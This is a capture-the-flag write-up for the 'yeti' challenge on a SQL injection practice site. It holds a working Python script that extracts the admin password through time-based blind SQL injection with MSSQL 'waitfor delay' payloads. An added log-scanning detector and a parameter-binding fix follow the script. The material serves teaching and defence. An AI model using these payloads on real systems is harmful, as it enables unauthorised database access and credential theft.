# yeti

This is the first screen.

![](/files/-M-nWGi6-D3BjQ_5lbxD)

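I recognized this as a Blind SQLi problem, and since there is no output to check the result against, I decided to solve it with Time-based Blind SQLi.

The delay is produced with `waitfor delay`.

The Python code is as follows.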

```python
import requests
import time

URL = 'https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php?pw='
PHPSESSID = 'MY_PHPSESSID'
SLEEP = 2  # delay in seconds requested via waitfor delay


def query(payload):
    """Send the payload and return True if the response took longer than SLEEP seconds."""
    start = time.time()
    cookies = {'PHPSESSID': PHPSESSID}
    requests.post(URL + payload, cookies=cookies)
    # A slow response means the injected condition was true and the delay ran.
    return time.time() - start > SLEEP


# Result: 8
def find_pw_length():
    """Increase the candidate length until the length comparison triggers the delay."""
    pw_len = 1
    while query("' if(len((select pw from prob_yeti where id='admin'))={}) waitfor delay '00:00:0{}'--".format(pw_len, SLEEP)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# Result: 6425b725
def find_pw():
    """Recover the pw one character at a time by comparing each position's code point."""
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("' if(unicode(substring((select pw from prob_yeti where id='admin'),{},1))={}) waitfor delay '00:00:0{}'--".format(pos, character, SLEEP)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

Running it gives the pw `6425b725`.

Accessing <https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php?pw=6425b725> solves the challenge.

![](/files/-M-nbg9NaTy4S_TnNraK)
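
Seen from the defending side, the requests generated above leave a clear trail: a `waitfor delay` literal in the `pw` parameter, and a response time that matches the requested delay whenever the injected condition was true. The following log check is an added example, not part of the original write-up; the log format, the shortened path `/chall/yeti.php`, the IP addresses and the timings are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (assumed format): client IP, quoted request line,
# response time in seconds. Not taken from the challenge server.
SAMPLE_LOG = """\
203.0.113.7 "GET /chall/yeti.php?pw=%27%20if(len((select%20pw%20from%20prob_yeti%20where%20id%3D%27admin%27))%3D7)%20waitfor%20delay%20%2700%3A00%3A02%27-- HTTP/1.1" 0.041
203.0.113.7 "GET /chall/yeti.php?pw=%27%20if(len((select%20pw%20from%20prob_yeti%20where%20id%3D%27admin%27))%3D8)%20waitfor%20delay%20%2700%3A00%3A02%27-- HTTP/1.1" 2.038
198.51.100.4 "GET /chall/yeti.php?pw=hunter2 HTTP/1.1" 0.039
198.51.100.9 "GET /search.php?q=how+to+use+waitfor+delay HTTP/1.1" 0.050
"""

LINE = re.compile(r'^(\S+) "[A-Z]+ (\S+) [^"]*" ([\d.]+)$')
# Require the quoted hh:mm:ss literal so plain text mentioning the words is ignored.
WAITFOR = re.compile(r"waitfor\s+delay\s+'(\d{1,2}):(\d{2}):(\d{2})'", re.I)


def scan(log_text):
    """Return {client_ip: {"probes": n, "honored": n}} for WAITFOR DELAY payloads."""
    report = defaultdict(lambda: {"probes": 0, "honored": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, elapsed = m.group(1), m.group(2), float(m.group(3))
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            d = WAITFOR.search(value)
            if not d:
                continue
            delay = int(d[1]) * 3600 + int(d[2]) * 60 + int(d[3])
            report[ip]["probes"] += 1
            # A response at least as slow as the requested delay means the
            # database executed the injected statement, not just received it.
            if delay > 0 and elapsed >= delay:
                report[ip]["honored"] += 1
            break
    return dict(report)


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A non-zero `honored` count is the signal to prioritise: it shows the parameter reaches the query unescaped, which is fixed by binding `pw` as a query parameter rather than concatenating it.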

